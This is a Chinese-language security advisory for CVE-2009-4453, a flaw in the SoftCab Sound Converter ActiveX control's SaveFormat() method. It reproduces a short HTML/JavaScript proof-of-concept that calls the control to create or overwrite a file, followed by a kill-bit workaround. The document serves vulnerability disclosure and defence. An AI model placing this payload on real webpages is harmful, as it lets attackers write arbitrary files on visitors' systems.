发布日期：2009-12-29
更新日期：2009-12-30

受影响系统：

SoftCab Sound Converter ActiveX 1.2

描述：

---

CVE(CAN) ID: CVE-2009-4453

Sound Converter ActiveX是用于将WAV文件转换为MP3、GSM等格式的ActiveX控件。

SoftCab.SoundConverter ActiveX控件（sndConverter.ocx）使用了不安全的SaveFormat()方式，用户受骗访问了恶意网页就会导致在系统上创建或覆盖任意文件。

<*来源：ThE g0bL!N
  
  链接：http://secunia.com/advisories/37967
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<!--  

<title>Exploited By : ThE g0bL!N </title>  

<BODY>  

<object id=dz classid="clsid:{66757BFC-DA0C-41E6-B3FE-B6D461223FF5}"></object>  

<SCRIPT>  


function Do_it()  

{  

     File = "Dz.exe"  

   dz.SaveFormat(File)  

}  


</SCRIPT>  

<h3>SoftCab Sound Converter ActiveX (sndConverter.ocx) Insecure Method Exploit </h3>  

<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>  

</body>  

</HTML>

建议：

---

临时解决方法：

* 为clsid {66757BFC-DA0C-41E6-B3FE-B6D461223FF5}设置kill bit。

厂商补丁：

SoftCab
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.softcab.com/

浏览次数：2288
严重程度：0（网友投票）